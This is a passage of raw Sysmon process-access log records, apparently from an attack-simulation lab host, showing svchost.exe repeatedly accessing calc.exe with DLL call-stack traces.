l+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360888Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.140{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360887Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.140{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360886Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.140{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360885Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.140{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360884Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.140{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360883Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.140{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360882Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.140{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360881Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.140{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360880Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.140{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360879Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.140{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360878Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.140{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360877Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.140{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360876Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.140{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360875Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.140{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360874Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.140{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360873Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.140{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360872Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.140{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360871Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.140{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360870Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.140{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360869Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.140{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360868Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.140{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360867Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.140{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-36e0-6013-a403-000000001100}916C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windo